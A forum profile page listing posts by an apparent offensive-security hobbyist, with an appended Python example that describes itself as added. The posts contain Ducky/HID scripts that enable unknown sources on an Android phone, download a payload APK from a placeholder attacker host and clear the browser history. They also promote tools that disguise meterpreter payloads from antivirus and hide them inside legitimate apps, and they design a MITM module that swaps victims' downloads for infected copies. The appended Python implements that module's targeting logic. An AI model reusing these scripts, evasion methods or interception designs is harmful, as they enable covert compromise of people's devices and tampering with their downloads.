n33dsh3llz
Active Members (13 posts)

Everything posted by n33dsh3llz

  1. Well, I was originally unable to get basic ADB working over the OTG like you would when connected to the phone directly with USB debugging enabled. I tried the method demmsec did in that payload, but it would never get an IP address. Come to find out, it was able to pull an address once I disabled my mobile data. I assume this is because of checks Android does to make sure it is using the best network connection, and the Bash Bunny has no actual connection to the internet. With that, I may just need to add some extra HID commands to get the job done.
     J
     Edit: Now I am unable to replicate the network popup I was getting upon initially turning off mobile data.
  2. Thanks! I was trying to manually transfer the package over and run it. I haven't connected mine to the internet, so that may be the way I go this weekend. Also, the FireTV payload seems right where I was going with this, but for Android phones. Thanks for the heads up, as this will save some time! The biggest thing with launching the default payload generated by msfvenom is that it will be flagged by AV. Calling the activity will require some work using my AV bypass script, as it randomizes the naming structure, but it wouldn't be hard to explain how to get that information. I wasn't thinking of using the connect method with emulating a network adapter, but it looks like DemmSec may have saved me some more headaches!
     Justin
  3. How would I go about getting an ARM version of ADB working on the Bash Bunny? I tried using Google's Python implementation of ADB, but it required libusb1 and other dependencies. The goal is to make a payload that:
     - Enables USB debugging (HID)
     - Accepts the connection to the device (HID)
     - Installs the package via ADB (bash)
     - Launches the package via ADB (bash)
     I had the HID payload working for enabling USB debugging, but then realized ADB was for x64 processors. I found a couple of ARM versions, but couldn't get any of them working properly. Can anyone help me out with this? Ideally, I would like to utilize my apkwash script (https://github.com/jbreed/apkwash) to generate a lightweight payload to use for pushing onto a device. With ADB you can also attempt to gain root through ADB methods that otherwise wouldn't be accessible.
  4. You also want to make sure your sources.list has the repo. http://docs.kali.org/general-use/kali-linux-sources-list-repositories
  5. What is happening is the script is seeing PayloadTrustManager.smali in the pulled-apart payload generated by msfvenom. This payload has a signature I haven't spent time avoiding with AVG. The quickest solution is to make sure you are completely updated. On Kali Rolling:
     apt-get dist-upgrade
     apt-get update
     apt-get upgrade
     Also, after spending a weekend throwing this together, I realized the '-x' option on msfvenom appears to get the job done as well for injecting into other payloads. So if you want to do a phishing attack, instead of using apkinjector you can use msfvenom with the '-x' option and the apk to inject into. Of course, the bash script is very similar to what msfvenom is doing, so looking it over will give you an understanding of what is happening, and if it is flagged by an AV you can simply modify the bash script to get around it.
  6. Ended up finishing the unknown sources setting, but figured it is a waste of time as it can be easily bypassed once attempting to install. https://github.com/jbreed/usb-ducky-android-download
     Here is what I think will work best, as there are so many issues that can arise.
     Potential issues:
     - Default browser not set to Chrome. ALT d is to get the URL line for the "Internet" app. May add this just to make it fail-safe.
     - Default browser not set at all. This will simply require pressing the button to relaunch the script, as it should have been set with the first run.
     What would take place after:
     - Install the apk (bypass untrusted sources, select 'open')
     - Clear browsing history if the default app wasn't Chrome
     - Delete the downloaded .apk file (if launched with Chrome, then the script below will take you to the screen afterwards)

     DELAY 200
     REM ----- BACK OUT TO MAIN MENU -----
     ESCAPE
     ESCAPE
     REM ----- OPEN BROWSER -----
     GUI b
     DELAY 1000
     REM ----- SELECT URL BAR AND NAVIGATE -----
     CTRL l
     ALT d
     DELAY 200
     STRING example.com
     DELAY 250
     ENTER
     DELAY 250
     REM ----- DOWNLOAD HAS BEGUN -----
     REM ----- TIME TO INSTALL MANUALLY -----
     REM ----- FOR CHROME, CLEARING HISTORY AND OPENING DOWNLOADS -----
     CTRL h
     DELAY 300
     TAB
     TAB
     TAB
     DELAY 10
     ENTER
     DELAY 100
     F10
     DELAY 300
     DOWN
     DOWN
     DOWN
     DOWN
     DOWN
     DOWN
     ENTER
  7. Would be similar to using Meterpreter through the internet. WAN IP -> Router-> port-forwarding to Empire listener
  8. Are you scanning from within the local subnet?
  9. Hello Hak5 Community, I'm trying to figure out how to download a .apk file, then execute it. I know how to download it, which may be enough. Ideally, the whole process could be 100% automated. Maybe I could just sleep the script, giving the user time to launch manually if there are no hotkeys. I tried opening the downloads inside the browser, but couldn't find a way to select the rows of downloaded files (maybe a security feature). Also, when bringing down the main bar and going to the downloaded file, then launching, it never opened the app other than seeing the AV scan take place.
     Note: WINDOWS+N brings down the top slider bar & F10 opens downloads in Chrome. The documentation said CTRL+J opened downloads, but it wasn't working for me. Can't figure out a way to open the downloaded .apk file.
     Here is what I have so far. Keep in mind delays have not been put in yet, and this is merely a run-down using a keyboard:

     #Allow unknown sources
     ESCAPE                  #(x whatever for main screen)
     WINDOWS+N
     UP
     ENTER
     DOWN ARROW x 6
     ENTER
     DOWN ARROW x 7
     ENTER
     RIGHT ARROW
     ENTER
     ESCAPE                  #(x whatever to get to main screen)
     #Begin the download and install of the payload
     WINDOWS+B               #Brings up the browser
     CTRL+SHIFT+N            #Open incognito window (if not Chrome, shouldn't do anything)
     CTRL+L                  #Access the URL bar
     STRING http://x.x.x.x:xxxx/payload.apk    #types in the file to download
     ENTER
     ** FIGURE OUT WAY TO LAUNCH IT **
     TAB
     TAB                     #Places you at INSTALL
     ENTER
     SLEEP X                 #Give time to install
     TAB
     TAB
     ENTER                   #Launch

     Recent scripts I wrote to bypass Android AV:
     https://github.com/jbreed/apkwash
     https://github.com/jbreed/apkinjector
     For this attack, apkwash would be perfect, as it would simply mask the small .apk file generated by msfvenom. Smaller = faster downloading. Maybe a twin-duck for this would work better to install from local media.
 10. Hello everyone, this weekend I got a little bored and began toying with Android payloads just to try a meterpreter shell and see how it is. Upon doing so, I noticed the payload generated from msfvenom required me to ignore my AV to install. So this sent me down a path to bypass antivirus, which, come to find out, WAS EXTREMELY EASY! I began with apkwash, which simply takes the msfvenom-generated payload and modifies it to bypass AV. The result... 0/35 on nodistribute, and confirmed manually with AVG Mobile and Kaspersky Mobile. Nice! Perfect for having physical access to a device. Now if only a ducky script could auto-download and install the payload, that would make this awesome. Otherwise, you would need a couple of minutes alone with their unlocked phone. Then I was wondering about attempts without having physical access. You would want a more convincing app to install. What better way than injecting the same AV-bypassing payload into a legit app? Well, some people had examples on how to do this online, but it required a long process to do it all manually. Why not script it? Well, each app is different, so this can be hit or miss, so I allowed manual pieces for those special apps. The result was apkinjector, which, by utilizing the apkwash technique of AV bypass, is able to make a hidden payload inside another APK. Perfect! Now, the downside to this is that APKTool has issues with certain packages (Facebook, Starbucks, etc.). I have had success injecting into about 70-80% of .apk files.
     GitHub:
     https://github.com/jbreed/apkwash
     https://github.com/jbreed/apkinjector
 11. ON-THE-FLY FILE INJECTION
     Goal: With a MITM attack in progress, be able to sniff traffic and modify any requested downloads to the victim/client machines utilizing Ettercap. With this, the attacker should have the option to use a previously created payload from a file location, or allow for on-the-fly injection using simple 'expect' scripts passing a downloaded file over to a program for injection before forwarding it to the client. For pre-set files, the filenames would be modified to match the requested file before being pushed to the client.
     Ettercap filters:
     - Locate EXE files
     - Locate Office files
     - Locate PDF files
     Stored user variables (Pineapple module options using a Bootstrap front-end):
     - Max file size (prevent injecting large files, which causes long latencies)
     - Select associated client(s) to attack
     - Injection method: on-the-fly (Shellter, Metasploit, Veil/Macro_safe.py)
     - Payload (would be awesome to detect the OS and use a correlated payload for it)
     - LHost
     - LPort
     - Custom/pre-set files: file locations (payload.exe, payload.pdf, payload.doc, payload.docx, payload.xls, etc.)
     - Option to auto-add the client/file correlation to a blacklist once it was already injected and forwarded
     Config files:
     - Template for adding more injection methods to supplement Shellter, Veil and Metasploit as the defaults.
 12. Found the YouTube series on creating modules: https://www.youtube.com/watch?v=Lvf2At3G1C0
     I have experience with Bootstrap and AngularJS, so it shouldn't take too long to figure out the formatting for the modules. The only thing is, hopefully I can leverage another module for finding *.exe download requests for a MITM attack; otherwise it would make creating this take a lot longer. It needs to be able to have a MITM running and replace any .exe a client requests with one that has a custom payload put in it. If anyone knows of something that already does this, then please let me know.
 13. Hello Hak5 members, I'm new to this site and platform, but am pretty excited to be back in the States and to get my hands on the Tetra I purchased. When looking at modules, I can't seem to find something similar to the MITMf framework integrated into it. That makes use of FilePwn, but I have been having a great experience using Shellter. Where should I go for learning how to integrate a new module into the Pineapple? Here is what I am wanting:
     1. Client makes a request for a .exe file
     2. Pineapple forwards it to the web server
     3. Web server responds
     4. Pineapple receives the traffic:
        If (PARAMS == TRUE):
            Pass the executable over to Shellter, inject a payload, then forward to the client.
        else:
            forward to the client
     Some of the params you would set up would be maximum file size (to make sure the process doesn't take too long), whether the program is already wrapped, etc. Ideally, one would be running some sort of HTTPS downgrade attack, or SSL stripper, so the probability of injection is higher, as most sites now use HTTPS. Shellter has been awesome for me when it comes to AV evasion, but it may also be perfect to allow users to pipe the executable to whatever program they want to handle the payload injection, and just have the module looking for the created file to pop up in a specific location.
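One way to lay out the decision logic sketched in this post and in the ON-THE-FLY FILE INJECTION post above (file-type detection, client selection, maximum file size, and an already-injected blacklist), as an added Python example that is not part of the original posts, of MITMf/FilePwn, or of any Pineapple module. It assumes a proxy that hands each HTTP response body and the requesting client's IP to gate(); the names Policy, gate, classify and marker_injector are this example's own, the sample bodies are constructed, and marker_injector is a stand-in that only appends a marker where a real module would hand the file to Shellter or msfvenom.

```python
"""Decision logic for a download-interception module (constructed example).

A MITM proxy hands each HTTP response body to gate(). gate() decides whether
the body is a file type the module targets, whether the client is selected,
whether the file is small enough to process, and whether this client/file
pair has already been handled, and only then calls the injector. The
injector is a parameter so the logic runs without Shellter or Metasploit.
"""
import hashlib
from dataclasses import dataclass, field
from typing import Callable, Optional, Set, Tuple

# File signatures checked on the body itself. URL extension and Content-Type
# are under the server's control, so the magic bytes are the reliable signal.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls/.ppt
ZIP_MAGIC = b"PK\x03\x04"                         # .docx/.xlsx/.pptx are ZIPs


def classify(body: bytes) -> Optional[str]:
    """Return 'exe', 'pdf', 'office', or None for anything else."""
    if body.startswith(b"MZ"):
        return "exe"
    if body.startswith(b"%PDF"):
        return "pdf"
    if body.startswith(OLE_MAGIC):
        return "office"
    # A ZIP only counts as Office when it carries the OOXML content-types
    # part; an arbitrary .zip download is left alone.
    if body.startswith(ZIP_MAGIC) and b"[Content_Types].xml" in body[:65536]:
        return "office"
    return None


@dataclass
class Policy:
    max_bytes: int = 5 * 1024 * 1024                  # skip big files (latency)
    clients: Set[str] = field(default_factory=set)    # empty set = every client
    kinds: Set[str] = field(default_factory=lambda: {"exe", "pdf", "office"})
    handled: Set[Tuple[str, str]] = field(default_factory=set)  # (client, sha256)
    produced: Set[str] = field(default_factory=set)   # sha256 of files we emitted


Injector = Callable[[str, bytes], bytes]


def gate(policy: Policy, client_ip: str, body: bytes,
         injector: Injector) -> Tuple[str, bytes]:
    """Return (reason, body_to_forward). A 'pass:' reason means the original
    body is forwarded untouched; 'inject:<kind>' means the injector ran."""
    kind = classify(body)
    if kind is None or kind not in policy.kinds:
        return "pass:type", body
    if policy.clients and client_ip not in policy.clients:
        return "pass:client", body
    if len(body) > policy.max_bytes:
        return "pass:size", body
    digest = hashlib.sha256(body).hexdigest()
    if digest in policy.produced:
        # Our own output coming back through the proxy (re-download, cache):
        # never wrap a file that is already wrapped.
        return "pass:already-wrapped", body
    if (client_ip, digest) in policy.handled:
        return "pass:already-served", body
    out = injector(kind, body)
    policy.handled.add((client_ip, digest))
    policy.produced.add(hashlib.sha256(out).hexdigest())
    return "inject:" + kind, out


def marker_injector(kind: str, body: bytes) -> bytes:
    """Stand-in for the external tool (Shellter, msfvenom -x, a macro
    injector). It only appends a marker so the output differs from the
    input; it performs no real injection."""
    return body + b"\n%% marker-" + kind.encode() + b"\n"


# Constructed sample bodies, not real downloads.
SAMPLES = {
    "exe": b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x00" * 200,
    "pdf": b"%PDF-1.4\n%constructed sample\n%%EOF\n",
    "docx": ZIP_MAGIC + b"\x00" * 26 + b"[Content_Types].xml" + b"\x00" * 100,
    "html": b"<html><body>not a download</body></html>",
    "big": b"MZ" + b"\x00" * 4096,
}


def demo() -> list:
    """Run the samples through one policy; return the decisions in order."""
    policy = Policy(max_bytes=1024, clients={"10.0.0.5"})
    decisions = []
    decisions.append(gate(policy, "10.0.0.5", SAMPLES["html"], marker_injector)[0])
    decisions.append(gate(policy, "10.0.0.9", SAMPLES["exe"], marker_injector)[0])
    decisions.append(gate(policy, "10.0.0.5", SAMPLES["big"], marker_injector)[0])
    reason, wrapped = gate(policy, "10.0.0.5", SAMPLES["exe"], marker_injector)
    decisions.append(reason)
    decisions.append(gate(policy, "10.0.0.5", SAMPLES["exe"], marker_injector)[0])
    decisions.append(gate(policy, "10.0.0.5", wrapped, marker_injector)[0])
    decisions.append(gate(policy, "10.0.0.5", SAMPLES["pdf"], marker_injector)[0])
    decisions.append(gate(policy, "10.0.0.5", SAMPLES["docx"], marker_injector)[0])
    return decisions


if __name__ == "__main__":
    for decision in demo():
        print(decision)
```

The two hash sets implement the "already wrapped" parameter from the post: handled stops a second injection for the same client and original file, and produced stops the module from re-injecting its own output if the client fetches it again. Keying on a hash of the body rather than the URL means a renamed copy of the same file is still recognised.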